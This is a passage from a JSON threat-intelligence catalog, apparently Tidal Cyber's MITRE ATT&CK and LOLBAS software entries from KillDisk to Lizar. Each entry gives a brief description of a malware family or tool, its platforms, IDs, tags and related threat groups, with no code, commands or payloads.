2016](https://app.tidalcyber.com/references/4d626eb9-3722-4aa4-b95e-1650cc2865c2)][[Trend Micro KillDisk 1](https://app.tidalcyber.com/references/8ae31db0-2744-4366-9747-55fc4679dbf5)][[Trend Micro KillDisk 2](https://app.tidalcyber.com/references/62d9a4c9-e669-4dd4-a584-4f3e3e54f97f)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0607", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "type": "similar" + }, + { + "dest-uuid": "12213e6d-72a5-447e-9e19-2a7eb7e2d81c", + "type": "similar" + }, + { + "dest-uuid": "f716a88b-4693-4d43-97b0-c5603202d586", + "type": "similar" + }, + { + "dest-uuid": "4b3409dd-72c5-4808-9d11-7806955a7231", + "type": "similar" + }, + { + "dest-uuid": "c0b27dd0-0895-4ddb-97da-2d55f2c22ca6", + "type": "similar" + }, + { + "dest-uuid": "df0e171c-ed35-4f1d-9ded-a16e58383bd7", + "type": "similar" + } + ], + "uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "value": "KillDisk" + }, + { + "description": "[Kinsing](https://app.tidalcyber.com/software/7b4f157c-4b34-4f55-9c20-ff787495e9ba) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. [[Aqua Kinsing April 2020](https://app.tidalcyber.com/references/67dd04dd-c0e0-49e6-9341-4e445d660641)][[Sysdig Kinsing November 2020](https://app.tidalcyber.com/references/4922dbb5-d3fd-4bf2-8af7-3b8889579c31)][[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]", + "meta": { + "platforms": [ + "Containers", + "Linux" + ], + "software_attack_id": "S0599", + "source": "MITRE", + "tags": [ + "efa33611-88a5-40ba-9bc4-3d85c6c8819b", + "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d6e55656-e43f-411f-a7af-45df650471c5", + "type": "similar" + } + ], + "uuid": "7b4f157c-4b34-4f55-9c20-ff787495e9ba", + "value": "Kinsing" + }, + { + "description": "[Kivars](https://app.tidalcyber.com/software/673ed346-9562-4997-80b2-e701b1a99a58) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in a 2010 campaign.[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0437", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "b2d134a1-7bd5-4293-94d4-8fc978cb1cd7", + "type": "similar" + } + ], + "uuid": "673ed346-9562-4997-80b2-e701b1a99a58", + "value": "Kivars" + }, + { + "description": "[Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[[Github Koadic](https://app.tidalcyber.com/references/54cbf1bd-9aed-4f82-8c15-6e88dd5d8d64)][[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)][[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0250", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "44f8bd4e-a357-4a76-b031-b7455a305ef0", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4", + "type": "similar" + } + ], + "uuid": "5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd", + "value": "Koadic" + }, + { + "description": "[Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) was first identified in late 2019.[[ESET Kobalos Feb 2021](https://app.tidalcyber.com/references/883a9417-f7f6-4aa6-8708-8c320d4e0a7a)][[ESET Kobalos Jan 2021](https://app.tidalcyber.com/references/745e963e-33fd-40d4-a8c6-1a9f321017f4)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0641", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9abdda30-08e0-4ab1-9cf0-d447654c6de9", + "type": "similar" + } + ], + "uuid": "bf918663-90bd-489e-91e7-6951a18a25fd", + "value": "Kobalos" + }, + { + "description": "[KOCTOPUS](https://app.tidalcyber.com/software/3e13d07d-d9e1-4456-bec3-b2375e404753)'s batch variant is loader used by [LazyScripter](https://app.tidalcyber.com/groups/12279b62-289e-49ee-97cb-c780edd3d091) since 2018 to launch [Octopus](https://app.tidalcyber.com/software/8f04e609-8773-4529-b247-d32f530cc453) and [Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) and, in some cases, [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b). [KOCTOPUS](https://app.tidalcyber.com/software/3e13d07d-d9e1-4456-bec3-b2375e404753) also has a VBA variant that has the same functionality as the batch version.[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0669", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "df9b350b-d4f9-4e79-a826-75cc75fbc1eb", + "type": "similar" + } + ], + "uuid": "3e13d07d-d9e1-4456-bec3-b2375e404753", + "value": "KOCTOPUS" + }, + { + "description": "[Komplex](https://app.tidalcyber.com/software/2cf1be0d-2fba-4fd0-ab2f-3695716d1735) is a backdoor that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://app.tidalcyber.com/software/6f411b69-6643-4cc7-9cbd-e15d9219e99c) [[XAgentOSX 2017](https://app.tidalcyber.com/references/2dc7a8f1-ccee-46f0-a995-268694f11b02)] [[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0162", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "f108215f-3487-489d-be8b-80e346d32518", + "type": "similar" + } + ], + "uuid": "2cf1be0d-2fba-4fd0-ab2f-3695716d1735", + "value": "Komplex" + }, + { + "description": "[KOMPROGO](https://app.tidalcyber.com/software/3067f148-2e2b-4aac-9652-59823b3ad4f1) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) that is capable of process, file, and registry management. [[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0156", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "7dbb67c7-270a-40ad-836e-c45f8948aa5a", + "type": "similar" + } + ], + "uuid": "3067f148-2e2b-4aac-9652-59823b3ad4f1", + "value": "KOMPROGO" + }, + { + "description": "[KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) has significant code overlap with the [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) to [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66).[[Talos Konni May 2017](https://app.tidalcyber.com/references/4cb69c58-4e47-4fb9-9eef-8a0b5447a553)][[Unit 42 NOKKI Sept 2018](https://app.tidalcyber.com/references/f3d3b9bc-4c59-4a1f-b602-e3e884661708)][[Unit 42 Nokki Oct 2018](https://app.tidalcyber.com/references/4eea6638-a71b-4d74-acc4-0fac82ef72f6)][[Medium KONNI Jan 2020](https://app.tidalcyber.com/references/e117a6ac-eaa2-4494-b4ae-2d9ae52c3251)][[Malwarebytes Konni Aug 2021](https://app.tidalcyber.com/references/fb8c6402-ec18-414a-85f7-3d76eacbd890)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0356", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "86b92f6c-9c05-4c51-b361-4c7bb13e21a1", + "type": "similar" + } + ], + "uuid": "d381de2a-30cb-4d50-bbce-fd1e489c4889", + "value": "KONNI" + }, + { + "description": "[KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1075", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "09fcc02f-f9d4-43fa-8609-5e5e186b7103", + "type": "similar" + } + ], + "uuid": "d09c4459-1aa3-547d-99f4-7ac73b8043f0", + "value": "KOPILUWAK" + }, + { + "description": "[Kwampirs](https://app.tidalcyber.com/software/35ac4018-8506-4025-a9e3-bd017700b3b3) is a backdoor Trojan used by [Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. [[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0236", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", + "type": "similar" + } + ], + "uuid": "35ac4018-8506-4025-a9e3-bd017700b3b3", + "value": "Kwampirs" + }, + { + "description": "[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]", + "meta": { + "id": "d1d035ea-1d90-45dd-9ff0-0536dd045a51", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "288b2ab2-255a-457a-a6eb-02ee4711d6b8", + "type": "similar" + } + ], + "uuid": "b7501271-0611-44a6-b8ee-844345798754", + "value": "Launch-VsDevShell.ps1" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1535981653239255040](https://twitter.com/nas_bench/status/1535981653239255040)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_launch_vsdevshell.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml)[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5258", + "source": "Tidal Cyber", + "tags": [ + "5be0da70-9249-44fa-8c3b-7394ef26b2e0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b7501271-0611-44a6-b8ee-844345798754", + "type": "similar" + } + ], + "uuid": "288b2ab2-255a-457a-a6eb-02ee4711d6b8", + "value": "Launch-VsDevShell" + }, + { + "description": "[LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is publicly available on GitHub.[[GitHub LaZagne Dec 2018](https://app.tidalcyber.com/references/9347b507-3a41-405d-87f9-d4fc2bfc48e5)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0349", + "source": "MITRE", + "tags": [ + "26c5dec7-3184-4873-ae20-9558a498a27f", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "type": "used-by" + }, + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "type": "used-by" + }, + { + "dest-uuid": "4bdc62c9-af6a-4377-8431-58a6f39235dd", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "type": "similar" + } + ], + "uuid": "f5558af4-e3e2-47c2-b8fe-72850bd30f37", + "value": "LaZagne" + }, + { + "description": "[[Ldifde.exe - LOLBAS Project](/references/45d41df9-328c-4ea3-b0fb-fc9f43bdabe5)]", + "meta": { + "id": "e35b1b7d-6a90-4758-9b38-d6f08fed6726", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d0ff555f-ba74-457c-b6e4-02962c230b60", + "type": "similar" + } + ], + "uuid": "6c55efe5-a5d3-411d-8993-697f2fc91144", + "value": "Ldifde.exe" + }, + { + "description": "Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to \"extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services\".[[Ldifde Microsoft](/references/c47ed0e0-f3e3-41de-9ea7-64fe4e343d9d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5017", + "source": "Tidal Cyber", + "tags": [ + "cea43301-9f7a-46a5-be3a-3a09f0f3c09e", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "6c55efe5-a5d3-411d-8993-697f2fc91144", + "type": "similar" + } + ], + "uuid": "d0ff555f-ba74-457c-b6e4-02962c230b60", + "value": "Ldifde" + }, + { + "description": "LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]\n\n**Related Vulnerabilities**: CVE-2023-34362[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)][[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5020", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "173e1480-8d9b-49c5-854d-594dde9740d6", + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [], + "uuid": "d5d79a51-3756-40de-81cd-4dac172fbb74", + "value": "LEMURLOOT" + }, + { + "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "id": "1c96db74-8cd0-41d5-8fcc-64c745e30d59", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "bce485ad-7d4f-45b6-b3c1-218f2f757611", + "type": "similar" + } + ], + "uuid": "d24d63ab-a1b5-4e20-9e60-f2df8fba9cb7", + "value": "Level.io" + }, + { + "description": "[[Mandiant UNC3944 September 14 2023](/references/7420d79f-c6a3-4932-9c2e-c9cc36e2ca35)]", + "meta": { + "id": "a8fb8466-5721-4b25-9f8a-a979d8906b0c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "bce485ad-7d4f-45b6-b3c1-218f2f757611", + "type": "similar" + } + ], + "uuid": "de43630e-5949-4c69-ab58-9e3d44a72386", + "value": "Level Remote Management" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that \"enables remote monitoring and management of systems\". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5067", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "d24d63ab-a1b5-4e20-9e60-f2df8fba9cb7", + "type": "similar" + }, + { + "dest-uuid": "de43630e-5949-4c69-ab58-9e3d44a72386", + "type": "similar" + } + ], + "uuid": "bce485ad-7d4f-45b6-b3c1-218f2f757611", + "value": "Level" + }, + { + "description": "[LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) exists.[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0395", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "6ba1d7ae-d60b-43e6-9f08-a8b787e9d9cb", + "type": "similar" + } + ], + "uuid": "c9d2f023-d54b-4d08-9598-a42fb92b3161", + "value": "LightNeuron" + }, + { + "description": "Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5034", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "3113cb05-23b4-4f90-ab7a-623b800302ce", + "value": "Ligolo" + }, + { + "description": "[Linfo](https://app.tidalcyber.com/software/925975f8-e8ff-411f-a40e-f799968046f7) is a rootkit trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Linfo May 2012](https://app.tidalcyber.com/references/e6b88cd4-a58e-4139-b266-48d0f5957407)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0211", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "e9e9bfe2-76f4-4870-a2a1-b7af89808613", + "type": "similar" + } + ], + "uuid": "925975f8-e8ff-411f-a40e-f799968046f7", + "value": "Linfo" + }, + { + "description": "[Linux Rabbit](https://app.tidalcyber.com/software/d017e133-fce9-4982-a2df-6867a80089e7) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[[Anomali Linux Rabbit 2018](https://app.tidalcyber.com/references/e843eb47-21b0-44b9-8065-02aea0a0b05f)]\n", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0362", + "source": "MITRE", + "tags": [ + "b20e7912-6a8d-46e3-8e13-9a3fc4813852", + "70dc52b0-f317-4134-8a42-71aea1443707" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0efefea5-78da-4022-92bc-d726139e8883", + "type": "similar" + } + ], + "uuid": "d017e133-fce9-4982-a2df-6867a80089e7", + "value": "Linux Rabbit" + }, + { + "description": "[LiteDuke](https://app.tidalcyber.com/software/71e4028c-9ca1-45ce-bc44-98209ae9f6bd) is a third stage backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), primarily in 2014-2015. [LiteDuke](https://app.tidalcyber.com/software/71e4028c-9ca1-45ce-bc44-98209ae9f6bd) used the same dropper as [PolyglotDuke](https://app.tidalcyber.com/software/3b7179fa-7b8b-4068-b224-d8d9c642964d), and was found on machines also compromised by [MiniDuke](https://app.tidalcyber.com/software/2bb16809-6bc3-46c3-b28a-39cb49410340).[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0513", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "95e2cbae-d82c-4f7b-b63c-16462015d35d", + "type": "similar" + } + ], + "uuid": "71e4028c-9ca1-45ce-bc44-98209ae9f6bd", + "value": "LiteDuke" + }, + { + "description": "[LitePower](https://app.tidalcyber.com/software/cc568409-71ff-468b-9c38-d0dd9020e409) is a downloader and second stage malware that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0680", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "73da066d-b25f-45ba-862b-1a69228c6baa", + "type": "used-by" + }, + { + "dest-uuid": "9020f5c7-efde-4125-a4f1-1b70f1274ddd", + "type": "similar" + } + ], + "uuid": "cc568409-71ff-468b-9c38-d0dd9020e409", + "value": "LitePower" + }, + { + "description": "[[BiZone Lizar May 2021](https://app.tidalcyber.com/references/315f47e1-69e5-4dcb-94b2-59583e91dd26)][[Gemini FIN7 Oct 2021](https://app.tidalcyber.com/references/bbaef178-8577-4398-8e28-604faf0950b4)]", + "meta": { + "id": "59752f77-382b-4bc6-9e95-32a6db8c0e0a" + }, + "related": [ + { + "dest-uuid": "65d46aab-b3ce-4f5b-b1fc-871db2573fa1", + "type": "similar" + } + ], + "uuid": "1eb0bda6-e564-43eb-b440-8da9ffd39909", + "value": "Tirion" + }, + { + "description": "[Lizar](https://app.tidalcyber.com/software/65d46aab-b3ce-4f5b-b1fc-871db2573fa1) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d). It has likely been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least February 2021.[[BiZone Lizar May 2021](https://app.tidalcyber.com/references/315f47e1-69e5-4dcb-94b2-59583e91dd26)][[Threatpost Lizar May 2021](https://app.tidalcyber.com/references/1b89f62f-586d-4dee-b6dd-e5a5cd090a0e)][[Gemini FIN7 Oct 2021](https://app.tidalcyber.com/references/bbaef178-8577-4398-8e28-604faf0950b4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0681", 